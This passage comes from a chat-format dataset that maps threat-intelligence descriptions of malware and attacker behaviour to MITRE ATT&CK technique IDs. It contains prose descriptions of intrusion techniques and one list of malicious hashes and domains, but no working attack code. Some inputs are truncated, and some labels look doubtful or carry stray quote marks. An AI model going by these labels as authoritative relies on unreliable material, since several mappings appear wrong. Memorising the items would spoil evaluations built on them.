- Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CSPY Downloader can use GET requests to download additional payloads from C2." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) loadorder hijacking to activate the malware installation process." }, { "role": "assistant", "content": "T1574.001 - Hijack Execution Flow: DLL Search Order Hijacking" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Interestingly as we continued to expand and pivot in our data set, one of the C2 IPs used by an IRC bot payload from Magic Hound was found to be the same IP used to deliver a different IRC bot called MPK" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RainyDay can use HTTP in C2 communications." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Astaroth uses a fromCharCode() deobfuscation method to avoid explicitly writing execution commands and to hide its code." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crutch is able to bypass some security layers by abusing legitimate infrastructure – here Dropbox – in order to blend into normal network traffic while exfiltrating stolen documents and receiving commands from its operators" }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "It communicates with ftp.bytehost31[.]org via FTP for command and control (C2)" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Remsec can obtain information about the current user." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used regsvr32 for execution." }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HotCroissant has the ability to collect the username on the infected host." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The malicious modules in regsvr32.exe memory After the Irdsnhrxxxfery98 module is loaded, the malware searches different processes to continue its malicious activity depending on the way Irdsnhrxxxfery64 was loaded" }, { "role": "assistant", "content": "T1218.010 - Signed Binary Proxy Execution: Regsvr32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kobalos can record the IP address of the target machine." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If running with \"root\" permissions, OSX_OCEANLOTUS.D can create a persistence file in the folder \"/Library/LaunchDaemons\"." }, { "role": "assistant", "content": "T1543.004 - Create or Modify System Process: Launch Daemon" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In 2018, CTU researchers observed several GOLD KINGSWOOD campaigns involving SpicyOmelette, a tool used by the group during initial exploitation of an organization. This sophisticated JavaScript remote access tool is generally delivered via phishing, and it uses multiple defense evasion techniques to hinder prevention and detection activities. GOLD KINGSWOOD delivered SpicyOmelette through a phishing email containing a shortened link that appeared to be a PDF document attachment. When clicked, the link used the Google AppEngine to redirect the system to a GOLD KINGSWOOD-controlled Amazon Web Services (AWS) URL that installed a signed JavaScript file, which was SpicyOmelette" }, { "role": "assistant", "content": "T1566.002 - Phishing: Spearphishing Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "On Sunday August 24, 2014 we observed a spear phish email sent to a Taiwanese government ministry. Attached to this email was a malicious Microsoft Word document (MD5: f6fafb7c30b1114befc93f39d0698560) that exploited CVE-2012-0158. It is worth noting that this email appeared to have been sent from another Taiwanese Government employee, implying that the email was sent from a valid but compromised account" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File', 'T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lokibot has used \"cmd /c\" commands embedded within batch scripts." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is capable of keylogging." }, { "role": "assistant", "content": "T1056 - Input Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "captures screenshots based on specific keywords in the window’s title." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic." }, { "role": "assistant", "content": "T1090.004 - Domain Fronting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This final cluster appears to serve as the C2 infrastructure for a custom remote administration tool called Pteranodon. It is capable of downloading and executing files, capturing screenshots and executing arbitrary commands on compromised systems" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Metamorfo has collected the hostname and operating system version from the compromised host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "OSX_OCEANLOTUS.D can collect the network interface MAC address on the infected host." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MacMa can enumerate running processes." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FlawedAmmyy has used `rundll32` for execution." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group leveraged an open-source tool called SoftPerfect Network Scanner to perform network scanning." }, { "role": "assistant", "content": "T1046 - Network Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The actors used a Powershell cmdlet (NewManagementRoleAssignment) to grant the 'ApplicationImpersonation' role to a compromised account." }, { "role": "assistant", "content": "T1098.002 - Account Manipulation: Additional Email Delegate Permissions" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EVILNUM has used a one-way communication method via GitLab and Digital Point to perform C2." }, { "role": "assistant", "content": "T1102.003 - One-Way Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Many samples were programmed using Borland Delphi, which will mangle the default PE compile timestamp of a file." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Comnie will make requests to these URLs, looking for base64-encoded data after an identifier of ‘magnet:/’, as seen in the example below: Figure 14 GitHub storing Comnie C2 information In the example above, the C2 information is being stored within the user’s URL parameter within GitHub" }, { "role": "assistant", "content": "T1102 - Web Service', 'T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FormatLoader’s main purpose is to infect the machine with an additional malicious file by downloading the binary to the compromised machine. To do so, the malware adds digits from the hardcoded range one by one to the hardcoded format strings, and accesses the download links." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The OsInfo function in Komplex collects the current running username." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "malware ISMAgent falls back to its DNS tunneling mechanism if it is unable to reach the C2 server over HTTP." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Taidoor can search for specific files." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ursnif has dropped payload and configuration files to disk. Ursnif has also been used to download and execute additional payloads." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "contains modules to infect USB sticks and spread laterally to other Windows systems the stick is plugged into using autorun functionality." }, { "role": "assistant", "content": "T1091 - Replication Through Removable Media" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cuba has executed hidden PowerShell windows." }, { "role": "assistant", "content": "T1564.003 - Hide Artifacts: Hidden Window" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RATANKBA runs the \"net view /domain\" and \"net view\" commands." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT37 has a function in the initial dropper to bypass Windows UAC in order to execute the next payload with higher privileges." }, { "role": "assistant", "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUGARDUMP can identify Chrome, Opera, Edge Chromium, and Firefox browsers, including version number, on a compromised host." }, { "role": "assistant", "content": "T1518 - Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Patchwork payload has searched all fixed drives on the victim for files matching a specified list of extensions." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has dumped credentials, including by using ." }, { "role": "assistant", "content": "T1003 - OS Credential Dumping" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encoded C2 traffic with base64." }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Several files were downloaded to our Struts2 honeypot from the Chinese repository site gitee.com for a user named \"c-999. Around the same time, we observed similar activity pulling down files from a gitlab.com repository page for a user named \"c-18. All the repositories had a folder called \"ss\" that contained 16 files. The files were a collection of ELF executables, shell scripts, and text files that execute a variety of actions, including achieving persistence and the execution of an illicit cryptocurrency miner. Once the threat actor had compromised a system, they achieved persistence on the device by installing a cron job that downloads and executes a file \"logo.jpg\" from \"3389[.]space. This file is a shell script which, in turn, downloads mining executables from the threat actor's Git repositories and saves them under the filename \"java. The exact file downloaded depends on the victim's system architecture" }, { "role": "assistant", "content": "T1053.003 - Scheduled Task/Job: Cron" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This function keeps receiving data from the system clipboard and then determines if it is a valid bitcoin wallet address. If yes, it overwrites the wallet address with the attacker’s" }, { "role": "assistant", "content": "T1115 - Clipboard Data', 'T1565.002 - Transmitted Data Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT3 (also known as UPS), the actors responsible for Operation Clandestine Fox has quietly continued to send waves of spearphishing messages over the past few months. This actor initiated their most recent campaign on November 19, 2014 targeting multiple organizations. The attacker leveraged multiple exploits, targeting both CVE-2014-6332 and CVE-2014-4113. CVE-2014-6332 was disclosed publicly on 2014-11-11 and is a Windows OLE Automation Array Remote Code Execution vulnerability. CVE-2014-4113 is a privilege escalation vulnerability that was disclosed publicly on 2014-10-14." }, { "role": "assistant", "content": "T1587.004 - Exploits', 'T1566.003 - Spearphishing via Service', 'T1534 - Internal Spearphishing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "At first glance, these links generally cause less suspicion for the targets. After opening the links and several redirections, the victims are led to final phishing domains such as “mobile[.]recover-session-service[.]site” etc" }, { "role": "assistant", "content": "T1583.001 - Domains" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Indicators of compromise MITRE ATT&CK techniques Modify existing service Code signing File deletion Deobfuscate/decode files or information System information discovery Process discovery Service execution RunDLL32 Scripting Command-line Interface Data from local system Automated exfiltration Data encrypted Commonly used port Bypass user account control Hashes fe32d29fa16b1b71cd27b23a78ee9f6b7791bff3 f684e15dd2e84bac49ea9b89f9b2646dc32a2477 1d280a77595a2d2bbd36b9b5d958f99be20f8e06 19d9573f0b2c2100accd562cc82d57adb12a57ec f90a2155ac492c3c2d5e1d83e384e1a734e59cc0 9b832dda912cce6b23da8abf3881fcf4d2b7ce09 f3b62fea38cb44e15984d941445d24e6b309bc7b 66d2cea01b46c3353f4339a986a97b24ed89ee18 7113aaab61cacb6086c5531a453adf82ca7e7d03 d41daba0ebfa55d0c769ccfc03dbf6a5221e006a 25f4819e7948086d46df8de2eeeaa2b9ec6eca8c 35ab747c15c20da29a14e8b46c07c0448cef4999 e87de3747d7c12c1eea9e73d3c2fb085b5ae8b42 0e4a7c0242b98723dc2b8cce1fbf1a43dd025cf0 bca861a46d60831a3101c50f80a6d626fa99bf16 01530adb3f947fabebae5d9c04fb69f9000c3cef 4229896d61a5ad57ed5c247228606ce62c7032d0 4c7e975f95ebc47423923b855a7530af52977f57 5a6ad7a1c566204a92dd269312d1156d51e61dc4 1dc50bfcab2bc80587ac900c03e23afcbe243f64 003e21b02be3248ff72cc2bfcd05bb161b6a2356 9b7c3c48bcef6330e3086de592b3223eb198744a 85e2453b37602429596c9681a8c58a5c6faf8d0c Domains ftp.byethost31.com ftp.byethost11.com 1113427185.ifastnet.org navermail.byethost3.com nihon.byethost3.com" }, { "role": "assistant", "content": "T1048 - Exfiltration Over Alternative Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "None of the known documents contain a lure image or message to instruct the recipient to click the Enable Content button necessary to run the macro, as seen in Figure 1" }, { "role": "assistant", "content": "T1204 - User Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NCCIC observed multiple methods used by NotPetya to propagate across a network. The first and—in most cases—most effective method, uses a modified version of the Mimikatz tool to steal the user’s Windows credentials. The cyber threat actor can then use the stolen credentials, along with the native Windows Management Instrumentation Command Line (WMIC) tool or the Microsoft SysInternals utility, psexec.exe, to access other systems on the network. Another method for propagation uses the EternalBlue exploit tool to target unpatched systems running a vulnerable version of SMBv1. In this case, the malware attempts to identify other hosts on the network by checking the compromised system’s IP physical address mapping table. Next, it scans for other systems that are vulnerable to the SMB exploit and installs the malicious payload. Refer to the malware report, MIFR-10130295, for more details on these methods" }, { "role": "assistant", "content": "T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the obfuscated and packed version of the loader, an uncommon API call is used to facilitate code injection. As seen in the image below, the loader uses VirtualAllocExNuma to allocate new memory and store the returned base address. The beginning of an obfuscated shellcode is copied to this address after being decrypted using an RC4 algorithm.In addition to the shellcode an additional PE can be seen in memory" }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RobbinHood will search for an RSA encryption key and then perform its encryption process on the system files." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Its presence on a compromised system allows a threat actor to spawn a reverse shell, upload or download files, and capture keystrokes" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FLASHFLOOD achieves persistence by making an entry in the Registry's Run key." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MiniDuke can use DGA to generate new Twitter URLs for C2." }, { "role": "assistant", "content": "T1568.002 - Domain Generation Algorithms" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has registered a Windows shell script under the Registry key HKCU\\Environment\\UserInitMprLogonScript to establish persistence." }, { "role": "assistant", "content": "T1037 - Boot or Logon Initialization Scripts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Vidar can also receive settings from the C&C that tells it exactly what to do." }, { "role": "assistant", "content": "T1588.001 - Malware" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CrackMapExec can dump hashed passwords from LSA secrets for the targeted system." }, { "role": "assistant", "content": "T1003.004 - OS Credential Dumping: LSA Secrets" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "mailsearcher32 module This module searches the infected system’s files to gather email addresses for information-stealing purposes. Emotet, according to previous research by Brad Duncan, is also responsible for delivering this password-grabbing Trickbot variant, as well as Azorult, to users" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery', 'T1087.003 - Email Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Rundll32Call exported function begins by creating a named event named ‘RunOnce’. This event ensures that only a single instance of DDKong is executed at a given time. If this is the only instance of DDKong running at the time, the malware continues. This ensures that only a single instance of DDKong is executed at a given time. DDKong attempts to decode an embedded configuration using a single byte XOR key of 0xC3. Once decoded, the configuration contains the data shown in Figure 5 below" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT32 uses the Invoke-Obfuscation framework to obfuscate their PowerShell and also performs other code obfuscation. APT32 has also encoded payloads using Base64 and a framework called \"Dont-Kill-My-Cat (DKMC). APT32 also encrypts the library used for network exfiltration with AES-256 in CBC mode in their macOS backdoor." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "IceApple can use Base64 and \"junk\" JavaScript code to obfuscate information." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can use Rundll32 to execute additional payloads." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Reaver creates a shortcut file and saves it in a Startup folder to establish persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder', 'T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Find out all system information, including hardware being used and the exact version of your operating system, including security patches. Steal from your clipboard (things you’ve copied) - Control your printer - Lock/Restart/Shutdown your computer - Update the implant with a new address to beacon to or new functionality" }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The threat actor gave considerable effort to obfuscating the code of this new Anchor_DNS variant using stack strings, string encryption, and by implementing a packer. The following example shows considerable changes in the code of the WinMain() function between an older variant of Anchor_DNS and the new variant" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RedLeaves attempts to add a shortcut file in the Startup folder to achieve persistence. If this fails, it attempts to add Registry Run keys." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ebury can disable SELinux Role-Based Access Control and deactivate PAM modules." }, { "role": "assistant", "content": "T1562.001 - Impair Defenses: Disable or Modify Tools" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "When run, the first thing the script does is to retrieve a GUID associated to a LAN connection present on the machine by leveraging the interface offered by the WMI Class Root\\Microsoft\\Homenet\\HNet_Connection. If a LAN connection is not available, the script defaults to a hardcoded GUID. This GUID is later communicated to the C2. It’s possible that the threat actor used this GUID to verify that the threat is running in a desirable environment, i.e. a real machine with LAN connections available" }, { "role": "assistant", "content": "T1049 - System Network Connections Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Multiple SUNBURST samples have been recovered, delivering different payloads. In at least one instance the attackers deployed a previously unseen memory-only dropper we’ve dubbed TEARDROP to deploy Cobalt Strike BEACON" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dyre has the ability to identify network settings on a compromised host." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "All versions generate a list of files to encrypt by parsing the available drives and directories, but will avoid adding files that are of relevance to the malware" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to take a screenshot and send it to the C2 server." }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BADNEWS copies documents under 15MB found on the victim system to is the user's \"%temp%\\SMB\\\" folder. It also copies files from USB devices to a predefined directory." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the case of the observed exploit, specifically when handling Microsoft PowerPoint files, the packagers allows a Package OLE object to reference arbitrary external files, such as INF files, from untrusted sources. This will cause the referenced files to be downloaded in the case of INF files, to be executed with specific commands - An attacker can exploit this vulnerability to execute arbitrary code but will need a specifically crafted file and use social engineering methods (observed in this campaign) to convince a user to open it" }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The first stage logic is performed by ‘mklgsecondary’ which serves the purpose of downloading a file named ‘chrome.txt’ from a C2 server using the BITS utility. The downloader modifies the Chrome 